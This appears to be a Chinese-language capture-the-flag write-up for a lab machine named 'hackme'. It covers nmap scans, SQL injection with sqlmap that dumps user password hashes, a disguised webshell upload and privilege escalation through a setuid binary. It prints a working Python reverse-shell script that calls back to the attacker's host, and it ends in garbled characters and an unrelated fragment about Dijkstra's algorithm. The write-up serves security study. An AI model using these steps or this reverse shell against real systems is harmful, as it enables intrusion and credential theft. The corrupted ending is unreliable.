信息收集
Nmap部分
存活扫描:
└─# nmap -sn 192.168.10.1/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 15:00 CST
Nmap scan report for 192.168.10.1 (192.168.10.1)
Host is up (0.00012s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.10.2 (192.168.10.2)
Host is up (0.00017s latency).
MAC Address: 00:50:56:E5:B1:08 (VMware)
Nmap scan report for 192.168.10.133 (192.168.10.133) //靶机
Host is up (0.00033s latency).端口扫描:
└─# nmap -sS -p- 192.168.10.133
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 15:01 CST
Nmap scan report for 192.168.10.133 (192.168.10.133)
Host is up (0.00055s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:DC:16:77 (VMware)Nmap done: 1 IP address (1 host up) scanned in 2.15 seconds服务扫描:
└─# nmap -sSCV -p 22,80 -O --version-all 192.168.10.133
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6b:a8:24:d6:09:2f:c9:9a:8e:ab:bc:6e:7d:4e:b9:ad (RSA)
| 256 ab:e8:4f:53:38:06:2c:6a:f3:92:e3:97:4a:0e:3e:d1 (ECDSA)
|_ 256 32:76:90:b8:7d:fc:a4:32:63:10:cd:67:61:49:d6:c4 (ED25519)
80/tcp open http Apache httpd 2.4.34 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.34 (Ubuntu)
MAC Address: 00:0C:29:DC:16:77 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel目录扫描:
发现文件上传的路径
Web页面:
首页是登陆页面,发现可以注册用户。
注册用户,并登录。发现是个查询页面:
SQL注入
发现注入点,字段为3,我们直接sqlmap一把梭。
继续跑,顺便把信息整理一下。
Database: webapphacking
[2 tables]
+-------+
| books |
| users |
+-------+
Database: webapphacking
Table: users
[7 entries]
+----+--------------+------------+----------------+---------------------------------------------+
| id | name | user | address | pasword |
+----+--------------+------------+----------------+---------------------------------------------+
| 1 | David | user1 | Newton Circles | 5d41402abc4b2a76b9719d911017c592 (hello) |
| 2 | Beckham | user2 | Kensington | 6269c4f71a55b24bad0f0267d9be5508 (commando) |
| 3 | anonymous | user3 | anonymous | 0f359740bd1cda994f8b55330c86d845 (p@ssw0rd) |
| 10 | testismyname | test | testaddress | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| 11 | superadmin | superadmin | superadmin | 2386acb2cf356944177746fc92523983 |
| 12 | test1 | test1 | test1 | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| 13 | kitha | kitha | kitha | e10adc3949ba59abbe56e057f20f883e (123456) |
+----+--------------+------------+----------------+---------------------------------------------+
上传一句话木马
登录超级管理员 superadmin,,发现上传页面。可以上传图片马,,再用bp修改后缀即可。
蚁剑连接成功,,
反弹shell:
这里不能用nc,使用python反弹shell。
kali:nc -lvnp 2233
新建ftshell.py,内容如下,用蚁剑上传至目录并执行。
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.10.129",2233))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
蚁剑终端:python ftshell.py
提权:
www-data@hackme:/var/www/html/uploads$ cd /home
cd /home
www-data@hackme:/home$ ls
ls
hackme
legacy
www-data@hackme:/home$ cd hackme
cd hackme
www-data@hackme:/home/hackme$ ls
ls
www-data@hackme:/home/hackme$ cd ..
cd ..
8#TT 1tt$D���o�N/home$ cd legacy
www-data@hackme:/home/legacy$ ls
ls
touchmenot
www-data@hackme:/home/legacy$ ./touchmenot
./touchmenot
id
uid=0(root) gid=33(www-data) groups=33(www-data)的均匀成本搜索之迪杰斯特拉(Dijkstra)算法与源代码)
)
)
)
)